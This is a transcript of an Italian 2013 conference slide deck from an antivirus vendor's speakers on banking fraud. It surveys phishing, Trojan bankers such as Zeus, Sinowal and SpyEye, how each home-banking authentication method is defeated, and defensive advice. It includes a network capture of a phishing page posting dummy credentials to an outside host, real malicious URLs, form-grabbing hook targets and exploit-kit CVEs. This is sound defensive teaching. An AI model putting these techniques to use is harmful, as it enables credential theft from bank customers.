SlideShare uma empresa Scribd logo
1 de 43
Baixar para ler offline
Stato dell’arte delle truffe bancarie dal 
phishing ai Trojan.Banker, come si 
diffonde e come ci si difende 
mercoledì 23 ottobre alle ore 13:00 
sala Arena Trade - Pad. 1 
Relatori: ing. Gianfranco Tonello, Roberto Spagliccia Milano, 23/10/2013
Frode informatica 
25 Maggio 2012: fonte «Il Mattino di Padova» 
http://mattinopadova.gelocal.it/cronaca/2012/05/25/news/frode-informatica-ripulito-il-conto-degli-avvocati-di-padova-1.5154231 
Phishing 
Trojan 
Banker 
A xe sta ea 
segretaria! 
Ogni 
riferimento a 
persone o fatti 
è puramente 
casuale 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 2
Frodi bancarie: tecniche utilizzate 
• Phishing: si intende una tecnica attraverso la 
quale un soggetto malintenzionato (chiamato 
phisher), riesce a raccogliere dati personali di 
accesso, tramite tecniche di ingegneria sociale 
che negli anni si sono fatte sempre più raffinate. 
• Trojan Banker: malware in grado di rubare le 
credenziali di accesso alla propria banca, 
modificando le schermate di login dei più diffusi 
siti di home banking. 
3 
Scopo: rubare denaro dal conto corrente 
eseguendo bonifici su conti esteri. 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
Frodi bancarie: Phishing 
La tecnica è quella di inviare 
email relative al proprio 
conto corrente, nelle quali 
si invita il destinatario ad 
accedere immediatamente 
al proprio conto, per 
verificare i propri dati 
oppure per convalidare 
vincite o premi che l’istituto 
ha deciso di erogare. 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 4
Phishing con link fraudolento 1/2 
Link: 
http://gfsrtdrhqptyszmvs.siamsensationsthai.com/my/gfsrtdrhqptyszmvs.asp?e=<email> 
5 
http://siamsensationsthai.com 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
Phishing con link fraudolento 2/2 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 6
Phishing con allegato 1/3 
7 
Allegato 
Document-poste-it.html 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
Phishing con allegato 2/3 
8 
Sorgente della pagina: Document-poste-it.html 
Nome utente Pluto Paperino 
Password paperopoli 
Cod. fiscale pltppr73b08g224y 
Num. carta 4012 0526 7849 4512 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
Phishing con allegato 3/3 
Analisi traffico di rete 
[TCP Porta: 80 SEND src 192.168.1.39 -> dst 85.214.122.107 Len=711 Seq=0x37461cb3 Ack=0xa5b319fc ACK Flags=0x18] 
POST /ac.php HTTP/1.1 
Host: zimmerers.de 
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:24.0) Gecko/20100101 Firefox/24.0 
[..] 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 165 
utente=Pluto+Paperino&password=paperopoli&codice=pltppr73b08g224y&card1=4012&card2=0526&card3=7849& 
card4=4512&mese=10&anno=2015&cvv2=941&btn_login.x=36&btn_login.y=8 
[TCP Porta: 80 RECEIVE src 85.214.122.107 -> dst 192.168.1.39 Len=203 Seq=0xa5b319fc Ack=0x37461f7a ACK Flags=0x18] 
HTTP/1.1 302 Found 
Date: Mon, 07 Oct 2013 13:31:29 GMT 
Server: Apache 
Location: http://poste.it 
[..] 
[TCP Porta: 80 SEND src 192.168.1.39 -> dst 62.241.4.35 Len=414 Seq=0x3a538eb3 Ack=0xae867f70 ACK Flags=0x18] 
GET / HTTP/1.1 
Host: poste.it 
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:24.0) Gecko/20100101 Firefox/24.0 
[..] 
9 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
Phishing: statistiche gennaio – marzo 2013 
10 
• I siti di phishing sono diminuiti 
del 20% dal 4° trim. 2012 al 1° 
trim. 2013 
• Le segnalazioni di phishing sono 
diminuite del 31% da gennaio a 
marzo 2013 
Siti di Phishing - Marzo 2013 
Stati Uniti 53,18% Francia 2,38% 
Germania 7,40% Russia 2,34% 
UK 4,21% Brasile 2,33% 
Canada 4,15% Lituania 1,29% 
Turchia 3,81% Olanda 1,26% 
Fonte: Phishing Activity Trends Report 1st Quarter 2013 www.apwg.org 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
Autenticazione nell’home banking 
• Aut. a senso unico: Username e password statiche con 
tastiera fisica/virtuale 
• Autenticazione a due fattori: Gridcard e TAN 
(Transaction Access Number) 
• Autenticazione a due fattori: One Time password (OTP) 
• Autenticazione a due fattori: OTP via SMS 
• Autenticazione a due fattori: OTP via lettore di Smart 
Card (smart tan) 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 11
Aut. a senso unico: tastiera fisica 
Descrizione La password è una parola segreta o una stringa di caratteri 
usata per l’autenticazione. Con statica intendiamo una 
password costante, che non cambierà nel tempo, a meno che 
non venga aggiornata. La password viene inserita nel campo 
«textbox» dell’HTML attraverso la tastiera hardware o virtuale. 
Come viene sconfitta I trojan banker possono memorizzare la password attraverso 2 
tecniche: keylogging e form grabbing. 
Un keylogger può memorizzare ogni tasto premuto dall’utente, 
ma non è in grado di catturare la clipboard. L’utente può 
memorizzare le sue credenziali in un file e fare un «copia e 
incolla» per semplicità o per motivi di sicurezza. 
La tecnica del form grabbing consiste nell’intercettare le 
richieste API nel browser e memorizzare i dati del web form 
prima che siano passate ad internet. 
Valutazione dei rischi È vulnerabile alla maggior parte dei Trojan Banker 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 12
Aut. a senso unico: tastiera virtuale 
Descrizione La tastiera virtuale è stata introdotta in risposta al keylogging e 
form grabbing. Consiste nel creare una tastiera virtuale sullo 
schermo con una disposizione casuale dei tasti. 
Come viene sconfitta I trojan banker possono memorizzare l’area dell’immagine del 
tasto premuto oppure registrare un video della sequenza dei 
tasti premuti. Questo tipo attacco memorizza le informazioni in 
remoto per essere interpretate successivamente. 
Valutazione dei rischi È vulnerabile alla maggior parte dei Trojan Banker con 
funzionalità screen shot capturing. Non fornisce miglioramenti 
in termini di sicurezza rispetto alla textbox. 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 13
Autenticazione a due fattori: Gridcard e TAN 
(Transaction Access Number) 
Descrizione La grid card è una tabella o griglia che contiene di solito 50 
codici alfanumerici. Il sistema della grid card può richiedere lo 
stesso codice più volte. 
La TAN (Transaction Access Number) è similare alla grid card, 
contiene una lista di codici. 
Come viene sconfitta I trojan banker possono catturare un codice della grid card o 
TAN, e di eseguire una disposizione bancaria reiterata fino a 
che non viene richiesto il codice catturato. 
Valutazione dei rischi È vulnerabile a Trojan Banker. Questa soluzione non migliora la 
sicurezza contro keylogger o form grabber. 
Inserire il codice 
C2 F4 H5 
K V M 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 14
Autenticazione a due fattori: One Time 
password (OTP) 
Descrizione L’OTP (one time password) è una password che è valida solo 
per una sessione o disposizione. Gli OTP sono basati su 
algoritmi crittografici One-way e utilizzano chiavi differenti per 
ogni utente. Ogni OTP utilizzato viene cancellato o messo in 
una blacklist per non essere utilizzato una seconda volta. Le 
OTP sono valide solo per un breve periodo di tempo. 
Come viene sconfitta I trojan banker possono catturare l’OTP e bloccare l’inoltro alla 
banca, segnalando all’utente un’errata autenticazione all’home 
banking. Nel tempo di vita dell’OTP, il trojan banker ha tutte le 
informazioni necessarie per eseguire una disposizione. 
Valutazione dei rischi È vulnerabile a Trojan Banker «sofisticati». Questa soluzione è 
vulnerabile all’HTML injection e ad altre tecniche. 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 15
Autenticazione a due fattori: OTP via SMS 
Descrizione L’OTP (one time password) viene inviata attraverso un SMS. 
L’OTP è associato alla disposizione da eseguire. 
Come viene sconfitta La componente mobile del trojan banker può leggere l’SMS 
ricevuto e inoltrare il token OTP contenuto ad un server 
remoto. In questo modo il trojan banker ha tutte le 
informazioni necessarie per completare l’esecuzione della 
disposizione. 
Valutazione dei rischi È vulnerabile a Trojan Banker «sofisticati» che utilizzano 
componenti mobile. Questa soluzione è vulnerabile 
nell’intercettazione dell’SMS. 
Esempio di SMS: 
Fineco – SMS gratuito. 
Bonifico 10,59 EUR a CC 00001023456 Pluto Paperino. 
Conferma con SMS PIN 217489 o inoltra questo SMS al ******* 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 16
Autenticazione a due fattori: OTP via 
lettore di Smart Card (smart tan) 
Descrizione Quando viene eseguita una disposizione, il sito della banca 
mostrerà un codice relativo a quella transazione. 
Il codice indicato a video dovrà essere inserito nel lettore di 
smart card, inserendo prima la carta di credito e il suo relativo 
PIN, e poi digitando il codice indicato dalla banca. 
In risposta, il lettore restituirà un OTP necessario per concludere 
l’operazione dispositiva sul sito. 
Come viene sconfitta Il Trojan Banker modifica in modo silente la destinazione della 
disposizione autorizzata, grazie ad un attacco man-in-the-middle, 
senza che l’utente se ne accorga. 
Valutazione dei rischi Molto sicuro, ma è vulnerabile a Trojan Banker che modificano 
la destinazione della transazione. 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 17
Tecniche dei Trojan Banker 1/2 
Trojan Banker 
Rubare le 
credenziali 
bancarie 
Modificare la 
destinazione della 
disposizione 
Disposizione 
eseguita sul conto 
del truffatore 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 18
Tecniche dei Trojan Banker 2/2 
• Keylogging 
• Screen shot capturing 
• Browser protected storage 
• Redirect verso falsi siti bancari 
• VNC privata / Socks Proxy con Back Connect 
• Form grabbing (MITB) 
• SMS grabbing 
• Manipolazione automatica (passiva e attiva) 
• Android Banking App repacking 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 19
Form grabbing (MITB) 
Tutti i browser sono vulnerabili: IE, Firefox, 
Google Chrome, Opera, etc. 
Hooked API generiche 
GetWindowText, TranslateMessage (user32.dll) 
send, WSASend (ws2_32.dll) 
Internet Explorer 
HttpSendRequest (wininet.dll) 
HttpSendRequestEx (wininet.dll) 
InternetReadFile (wininet.dll) 
InternetReadFileEx (wininet.dll) 
InternetQueryDataAvailable (wininet.dll) 
InternetCloseHandle (wininet.dll) 
EncryptMessage (secure32.dll) 
1 
2 
4 
3 
Firefox 
PR_Connect (nspr4.dll) 
PR_Write (nspr4.dll) 
PR_Read (nspr4.dll) 
PR_Close (nspr4.dll) 
Nspr4.dll 
Malware 
dll 
injection 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 20
Frodi bancarie: Trojan Banker 
• Zeus (ZBot – Citadel – ICE IX): file eseguibile che infetta il 
pc, metodo di diffusione siti infetti o installato da altri 
malware 
• Sinowal: rootkit che infetta il Master Boot Record, 
metodo di diffusione siti infetti o installato da altri 
malware 
• Trojan.Win32.Banker: file eseguibile che infetta il 
computer, metodo di diffusione via email 
• Carberp / SpyEye / Gataka / IBANK : file eseguibile che 
infetta il pc, metodo di diffusione siti infetti o installato 
da altri malware 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 21
Zeus: Il primo trojan banker 
Anno 2007 
Nome file ntos.exe, oembios.exe, twext.exe, sdra64.exe 
Caratteristiche Web fake; Keylogger; Screen shot capture; Browser protected 
Storage; 
Form grabber: IE/Firefox; Web inject per Internet explorer; 
Socks proxy con back connection; VNC; Rubare certificati X.509 
Plugin venduti separatamente 
Target Banche US, UK, IT, etc 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 22
Zeus: banche italiane sotto il mirino 
Elenco di alcuni siti di banche italiane trovato all’interno del file di configurazione di Zeus 
https://www.gruppocarige.it/grps/vbank/jsp/login.jsp 
https://bancopostaonline.poste.it/bpol/bancoposta/formslogin.asp 
https://privati.internetbanking.bancaintesa.it/sm/login/IN/box_logi 
n.jspe 
https://hb.quiubi.it/newSSO/x11logon.htm 
https://www.iwbank.it/private/index_pub.jhtml* 
https://web.secservizi.it/siteminderagent/forms/login.fcc 
https://www.isideonline.it/relaxbanking/sso.Login 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 23
Trojan Banker: esempi di web inject 1/2 
24 
Il trojan Banker modifica (lato client) 
la pagina di login della banca, 
richiedendo anche la password 
dispositiva. Gli autori del malware 
possono accedere al conto online 
della vittima e eseguire bonifici su 
conti esteri alla sua insaputa. 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
Trojan Banker: esempi di web inject 2/2 
25 
Altro esempio di Web Injection dove 
viene richiesta anche la password 
dispositiva. 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
Sinowal: plugin per Google Chrome 
Anno 2008 
Tipologia Infetta il Master Boot Record, installa plugin o moduli per rubare le 
credenziali bancarie 
Plugin: Content.js; Plugin.dll; msseedir.dll; msdr.dll; lmbd.dll; wsse.dll; 
mmdd.dll; iexpgent64.dll (Nov. 2012 – ott. 2013) 
Caratteristiche Google Chrome plugin; Form Post tracking 
Target Banche NL 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 26
Sinowal: plugin per Google Chrome 
Wvgimhukax.crx 
Manifest.json 
Background.html 
Content.js 
Plugin.dll 
Wvgimhukax.crx Content.js Plugin.dll 
Tracciatura web 
form 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 27
Sinowal: default plugin -> content.js 
Il «default plugin» 
utilizzato da Sinowal è 
costituito da 2 moduli: 
• Content.js 
• Plugin.dll 
Il modulo javascript 
modifica il metodo POST 
per tutti i form caricati 
nella pagina web. 
In questo modo è in grado 
di leggere la password 
inserita nel form. 
Content.js 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 28
Frodi bancarie: Carberp e OTP 
VIRUS 
1 
2 
3 
4 
1. L’utente invia le sue credenziali di accesso alla banca: login, password, Pass-key 
Internet banking (OTP = One Time Password). 
2. Le credenziale vengono intercettate dal virus, che non le inoltra alla banca, ma le 
memorizza. Il virus visualizza un falso messaggio di inserimento errato di 
login/password 
3. L’utente re-inserisce login/password e un nuovo valore della Pass-key Internet 
banking. 
4. La Banca conferma la correttezza dei dati inseriti e l’utente accede al suo conto 
online 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 29
SpyEye: concorrente di Zeus 
Anno 2010 
Nome file Cleansweep.exe 
Caratteristiche Web fake; Keylogger; Screen shot capture; 
Form grabber: POST / GET; Web inject; 
Socks proxy con back connection; Rubare certificati X.509 
Plugin venduti separatamente 
Terminare «Zeus» 
Target Bank of America, banche UK, US, etc 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 30
ZITMO: Zeus In The MObile 
Zitmo: 
• Symbian 
• Android 
• Blackberry 
Spyeye-In- 
The-MObile: 
• Symbian 
Bonifico eseguito 
sul conto del 
truffatore 
10 
SMS Bank: 
PIN: nnnn 
4 
Login: 
Password: 
Num. di cellulare: 
Modello: 
Zeus botnet 
5 
SMS: 
Scarica la 
seguente app o 
certificato di 
sicurezza: link 
1 2 
3 
6 
7 
12 
8 
9 
11 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 31
Android Banking App: repacking 
Sviluppatore 
compilazione 
packing 
Firmato con 
APK 
Malicious attacker 
decompilazione 
Analisi 
codice 
Modifica del codice 
chiave 
privata 
Google market 
o di terze parti 
ricompilazione 
repacking 
Firmato con 
chiave privata 
APK 
Bonifico eseguito 
sul conto del 
truffatore 
1 
2 
3 
4 
5 6 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 32
Android Fineco App: esempio di repacking 
com.fineco.it-1comfinecoitdatamodeladx.smali 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 33
Android Fineco App: esempio di repacking 
SMS: 
Func=json/G_L 
OGINuserID= 
123password 
=abc 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 34
Maggiori cause di infezione 
• Navigazione su siti non raccomandabili 
• Navigazione su siti attendibili ma che sono 
stati compromessi (infettati) 
• Email con allegati infetti o link su siti infetti 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 35
Navigazione su siti non sicuri 
• Molti siti poco attendibili includono nelle loro pagine script 
(principalmente JavaScript o Flash) che sono in grado di 
scaricare ed eseguire codice sul computer di chi lo sta 
visitando. Questo può essere tanto più dannoso quanto più 
alto è il livello di privilegi con il quale è eseguito il browser 
(ad esempio Administrator). 
• Exploit kit: Black Hole, Cool Exploit (sfruttano vulnerabilità) 
• Molto spesso questo tipo di siti include pubblicità 
fraudolente, ingannevoli o banner pubblicitari che, se 
cliccati, portano ad altri siti infetti o al download di 
software dannoso 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 36
Black Hole: Vulnerabilità utilizzate 
37 
Vulnerabilità Descrizione 
CVE-2013-0422 Java 
CVE-2012-4681 Java 
CVE-2012-1889 Windows 
CVE-2012-1723 Java 
CVE-2012-0507 Java 
CVE-2011-3544 Java 
CVE-2011-2110 Adobe Flash Player 
CVE-2011-0611 Adobe Flash Player 
CVE-2010-3552 Java 
CVE-2010-1885 Windows 
Vulnerabilità Descrizione 
CVE-2010-1423 Java 
CVE-2010-0886 Java 
CVE-2010-0842 Java 
CVE-2010-0840 Java 
CVE-2010-0188 Adobe Reader 
CVE-2009-1671 Java 
CVE-2009-0927 Adobe Reader 
CVE-2008-2992 Adobe Reader 
CVE-2007-5659 Adobe Reader 
CVE-2006-0003 Internet Explorer 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
Virus dell’email 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 38
Come mi difendo dai Malware 
• Antivirus sempre aggiornato e installato su tutti i pc 
della rete 
• Aggiornare: Windows, Java, Adobe Reader, Adobe 
Flash Player 
• Avere buonsenso nell’uso del computer: 
• Verificare la tipologia degli allegati che si salvano, una 
fattura non sarà di tipo Applicazione 
• Verificare la destinazione dei link su cui si clicca 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 39
Conclusioni 
• Banche e istituti di credito non richiedono mai 
la password via email 
• Banche e istituti di credito non regalano premi 
in denaro, normalmente li chiedono! 
• Phishing in calo, ma attenzione! 
• Autenticazioni bancarie vulnerabili 
• Trojan Banker sofisticati e evoluti 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 40
Domande 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 41
Autori 
• Ing. Gianfranco Tonello (g.tonello@viritpro.com) 
• Roberto Spagliccia (r.spagliccia@viritpro.com) 
Grazie per l’attenzione 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 42
Referenze 
• http://www.tgosft.it 
• Phishing: un'attività che non passa mai di moda: http://www.tgsoft.it/italy/news_archivio.asp?id=408 
• Phishing Activity Trends Report 1st Quarter 2013: http://www.apwg.org 
• Home banking a rischio! Trojan.Win32.Banker.CS: la nuova frontiera del phishing: 
http://www.tgsoft.it/italy/news_archivio.asp?id=454 
• http://www.tomsguide.com/us/factor-authentication-in-online-banking,review-678-5.html 
• http://en.wikipedia.org/wiki/Transaction_authentication_number 
• https://www.owasp.org/images/e/e4/AppsecEU09_The_Bank_in_The_Browser_Presentation_v1.1.pdf 
• ZeuS Banking Trojan Report: http://www.secureworks.com/cyber-threat-intelligence/threats/zeus/ 
• SpyEye Malware Infection Framework – Virus Bulletin July 2011 (www.virusbtn.com) 
• Mobile Banking Vulnerability: Android Repacking Threat – Virus Bulletin May 2012 (www.virusbtn.com) 
«Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 43

Mais conteúdo relacionado

Mais procurados

I Quaderni dell' ISEA - Phishing
I Quaderni dell' ISEA - PhishingI Quaderni dell' ISEA - Phishing
I Quaderni dell' ISEA - PhishingISEA ODV
 
Amato HackInBo 2013
Amato HackInBo 2013Amato HackInBo 2013
Amato HackInBo 2013Gianni Amato
 
Phishing cos’è, come funziona, tipologie e come evitarlo.pdf
Phishing  cos’è, come funziona, tipologie e come evitarlo.pdfPhishing  cos’è, come funziona, tipologie e come evitarlo.pdf
Phishing cos’è, come funziona, tipologie e come evitarlo.pdfHelpRansomware
 
Phishing M11
Phishing M11Phishing M11
Phishing M11superpesa
 
Operazioni mirate e malware di Stato nell'era della guerra cibernetica e del ...
Operazioni mirate e malware di Stato nell'era della guerra cibernetica e del ...Operazioni mirate e malware di Stato nell'era della guerra cibernetica e del ...
Operazioni mirate e malware di Stato nell'era della guerra cibernetica e del ...Gianni Amato
 
Lezione 6 sicurezza sul web
Lezione 6   sicurezza sul webLezione 6   sicurezza sul web
Lezione 6 sicurezza sul webGeniusProgetto
 
Crimini Informatici 2012
Crimini Informatici 2012Crimini Informatici 2012
Crimini Informatici 2012Gianni Amato
 
Owasp security summit_2012_milanovs_final
Owasp security summit_2012_milanovs_finalOwasp security summit_2012_milanovs_final
Owasp security summit_2012_milanovs_finalMarco Morana
 
Alcune truffe con Internet
Alcune truffe con InternetAlcune truffe con Internet
Alcune truffe con InternetVito Colangelo
 
Summary of sunrise to sunset analyzing the end to-end life cycle and effectiv...
Summary of sunrise to sunset analyzing the end to-end life cycle and effectiv...Summary of sunrise to sunset analyzing the end to-end life cycle and effectiv...
Summary of sunrise to sunset analyzing the end to-end life cycle and effectiv...SilvioAngeloBarattoR
 
Cos'è un ransomware
Cos'è un ransomwareCos'è un ransomware
Cos'è un ransomwareMara Piscopo
 
Dagli alert alle denunce: il caso di Poste Italiane
Dagli alert alle denunce: il caso di Poste ItalianeDagli alert alle denunce: il caso di Poste Italiane
Dagli alert alle denunce: il caso di Poste Italianearmandoleotta
 
Phishing: come si realizza, come riconoscerlo ed evitarlo
Phishing: come si realizza, come riconoscerlo ed evitarloPhishing: come si realizza, come riconoscerlo ed evitarlo
Phishing: come si realizza, come riconoscerlo ed evitarlodenis frati
 
Internet e sicurezza
Internet e sicurezzaInternet e sicurezza
Internet e sicurezzarobitu
 

Mais procurados (20)

Sunrise tosunset
Sunrise tosunsetSunrise tosunset
Sunrise tosunset
 
I Quaderni dell' ISEA - Phishing
I Quaderni dell' ISEA - PhishingI Quaderni dell' ISEA - Phishing
I Quaderni dell' ISEA - Phishing
 
Amato HackInBo 2013
Amato HackInBo 2013Amato HackInBo 2013
Amato HackInBo 2013
 
Phishing cos’è, come funziona, tipologie e come evitarlo.pdf
Phishing  cos’è, come funziona, tipologie e come evitarlo.pdfPhishing  cos’è, come funziona, tipologie e come evitarlo.pdf
Phishing cos’è, come funziona, tipologie e come evitarlo.pdf
 
Phishing M11a
Phishing M11aPhishing M11a
Phishing M11a
 
Phishing M11
Phishing M11Phishing M11
Phishing M11
 
Il phishing
Il phishingIl phishing
Il phishing
 
Operazioni mirate e malware di Stato nell'era della guerra cibernetica e del ...
Operazioni mirate e malware di Stato nell'era della guerra cibernetica e del ...Operazioni mirate e malware di Stato nell'era della guerra cibernetica e del ...
Operazioni mirate e malware di Stato nell'era della guerra cibernetica e del ...
 
Lezione 6 sicurezza sul web
Lezione 6   sicurezza sul webLezione 6   sicurezza sul web
Lezione 6 sicurezza sul web
 
Crimini Informatici 2012
Crimini Informatici 2012Crimini Informatici 2012
Crimini Informatici 2012
 
Owasp security summit_2012_milanovs_final
Owasp security summit_2012_milanovs_finalOwasp security summit_2012_milanovs_final
Owasp security summit_2012_milanovs_final
 
Virus
VirusVirus
Virus
 
Alcune truffe con Internet
Alcune truffe con InternetAlcune truffe con Internet
Alcune truffe con Internet
 
Wwc2
Wwc2Wwc2
Wwc2
 
Summary of sunrise to sunset analyzing the end to-end life cycle and effectiv...
Summary of sunrise to sunset analyzing the end to-end life cycle and effectiv...Summary of sunrise to sunset analyzing the end to-end life cycle and effectiv...
Summary of sunrise to sunset analyzing the end to-end life cycle and effectiv...
 
Cos'è un ransomware
Cos'è un ransomwareCos'è un ransomware
Cos'è un ransomware
 
La sicurezza delle reti
La sicurezza delle retiLa sicurezza delle reti
La sicurezza delle reti
 
Dagli alert alle denunce: il caso di Poste Italiane
Dagli alert alle denunce: il caso di Poste ItalianeDagli alert alle denunce: il caso di Poste Italiane
Dagli alert alle denunce: il caso di Poste Italiane
 
Phishing: come si realizza, come riconoscerlo ed evitarlo
Phishing: come si realizza, come riconoscerlo ed evitarloPhishing: come si realizza, come riconoscerlo ed evitarlo
Phishing: come si realizza, come riconoscerlo ed evitarlo
 
Internet e sicurezza
Internet e sicurezzaInternet e sicurezza
Internet e sicurezza
 

Destaque

Coding for Hackers - Linux Day 2016
Coding for Hackers - Linux Day 2016Coding for Hackers - Linux Day 2016
Coding for Hackers - Linux Day 2016Andrea Draghetti
 
Basi per la sicurezza in rete
Basi per la sicurezza in reteBasi per la sicurezza in rete
Basi per la sicurezza in reteAlessandro Colla
 
Nativi digitali - La sicurezza online dei minori spiegata agli adulti - Ettor...
Nativi digitali - La sicurezza online dei minori spiegata agli adulti - Ettor...Nativi digitali - La sicurezza online dei minori spiegata agli adulti - Ettor...
Nativi digitali - La sicurezza online dei minori spiegata agli adulti - Ettor...SectorNoLimits
 
Fondamenti di Sicurezza Informatica
Fondamenti di Sicurezza InformaticaFondamenti di Sicurezza Informatica
Fondamenti di Sicurezza InformaticaDaniele Landro
 
Pericoli nascosti di internet e tipologie di virus
Pericoli nascosti di internet e tipologie di virusPericoli nascosti di internet e tipologie di virus
Pericoli nascosti di internet e tipologie di virusGiovanni Mennea
 
Copyright e Diritto D'Autore - L'ambiente Digitale
Copyright e Diritto D'Autore - L'ambiente DigitaleCopyright e Diritto D'Autore - L'ambiente Digitale
Copyright e Diritto D'Autore - L'ambiente DigitaleAdriana Augenti
 
Discorso cybersecurity
Discorso cybersecurityDiscorso cybersecurity
Discorso cybersecurityGiulioTerzi
 
Introduzione alla sicurezza informatica e giuridica
Introduzione alla sicurezza informatica e giuridicaIntroduzione alla sicurezza informatica e giuridica
Introduzione alla sicurezza informatica e giuridicaCouncil of Europe
 
Cyber security presentation
Cyber security presentationCyber security presentation
Cyber security presentationBijay Bhandari
 
josh Archive! - Normativa
josh Archive! - Normativajosh Archive! - Normativa
josh Archive! - Normativait Consult
 

Destaque (12)

Quale Agenda Digitale per Banche e Assicurazioni?
Quale Agenda Digitale per Banche e Assicurazioni?Quale Agenda Digitale per Banche e Assicurazioni?
Quale Agenda Digitale per Banche e Assicurazioni?
 
Coding for Hackers - Linux Day 2016
Coding for Hackers - Linux Day 2016Coding for Hackers - Linux Day 2016
Coding for Hackers - Linux Day 2016
 
Basi per la sicurezza in rete
Basi per la sicurezza in reteBasi per la sicurezza in rete
Basi per la sicurezza in rete
 
Nativi digitali - La sicurezza online dei minori spiegata agli adulti - Ettor...
Nativi digitali - La sicurezza online dei minori spiegata agli adulti - Ettor...Nativi digitali - La sicurezza online dei minori spiegata agli adulti - Ettor...
Nativi digitali - La sicurezza online dei minori spiegata agli adulti - Ettor...
 
Fondamenti di Sicurezza Informatica
Fondamenti di Sicurezza InformaticaFondamenti di Sicurezza Informatica
Fondamenti di Sicurezza Informatica
 
Pericoli nascosti di internet e tipologie di virus
Pericoli nascosti di internet e tipologie di virusPericoli nascosti di internet e tipologie di virus
Pericoli nascosti di internet e tipologie di virus
 
Copyright e Diritto D'Autore - L'ambiente Digitale
Copyright e Diritto D'Autore - L'ambiente DigitaleCopyright e Diritto D'Autore - L'ambiente Digitale
Copyright e Diritto D'Autore - L'ambiente Digitale
 
Sicurezza informatica nelle Scuole
Sicurezza informatica nelle ScuoleSicurezza informatica nelle Scuole
Sicurezza informatica nelle Scuole
 
Discorso cybersecurity
Discorso cybersecurityDiscorso cybersecurity
Discorso cybersecurity
 
Introduzione alla sicurezza informatica e giuridica
Introduzione alla sicurezza informatica e giuridicaIntroduzione alla sicurezza informatica e giuridica
Introduzione alla sicurezza informatica e giuridica
 
Cyber security presentation
Cyber security presentationCyber security presentation
Cyber security presentation
 
josh Archive! - Normativa
josh Archive! - Normativajosh Archive! - Normativa
josh Archive! - Normativa
 

Semelhante a Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende

Crittografia Firma Digitale
Crittografia Firma DigitaleCrittografia Firma Digitale
Crittografia Firma DigitaleMario Varini
 
635918284550670475 ransomware in ospedale
635918284550670475 ransomware in ospedale635918284550670475 ransomware in ospedale
635918284550670475 ransomware in ospedaleRosanna de Paola
 
R. Villano - Sicurezza e reati informatici: problemi tecnici, giuridici e no...
R. Villano - Sicurezza e reati informatici:  problemi tecnici, giuridici e no...R. Villano - Sicurezza e reati informatici:  problemi tecnici, giuridici e no...
